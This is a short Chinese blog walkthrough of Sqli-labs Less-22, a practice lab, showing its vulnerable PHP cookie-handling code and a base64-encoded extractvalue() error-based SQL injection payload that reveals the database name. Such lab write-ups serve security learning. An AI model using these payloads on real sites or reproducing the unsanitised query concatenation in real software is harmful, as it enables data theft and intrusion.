Sqli-labs Less-22 cookie注入 base64编码 extractvalue()报错注入

 
更多

本关和less20、less21是一致的,我们可以从源代码中看到这里对uname进行了”uname”的处理

$cookee = $_COOKIE['uname'];
$cookee = base64_decode($cookee);
$cookee1 = '"'. $cookee. '"';
$sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";
$result=mysql_query($sql);
if (!$result)
	{
	die('Issue with your mysql: ' . mysql_error());
	}

可以构造payload:

admin” and extractvalue(1,concat(0x7e,(select database()),0x7e)) #

Payload进行base64编码后,修改cookie再进行提交

Cookie: uname=YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4N2UpKSAj

可以看到数据库名为security

其他的payload请自行发散思维进行构造。

 

参考:https://www.cnblogs.com/lcamry/p/5763016.html

打赏

本文固定链接: https://www.cxy163.net/archives/4980 | 绝缘体

该日志由 绝缘体.. 于 2020年04月09日 发表在 未分类 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: Sqli-labs Less-22 cookie注入 base64编码 extractvalue()报错注入 | 绝缘体
关键字: , , , ,

Sqli-labs Less-22 cookie注入 base64编码 extractvalue()报错注入:等您坐沙发呢!

发表评论


快捷键:Ctrl+Enter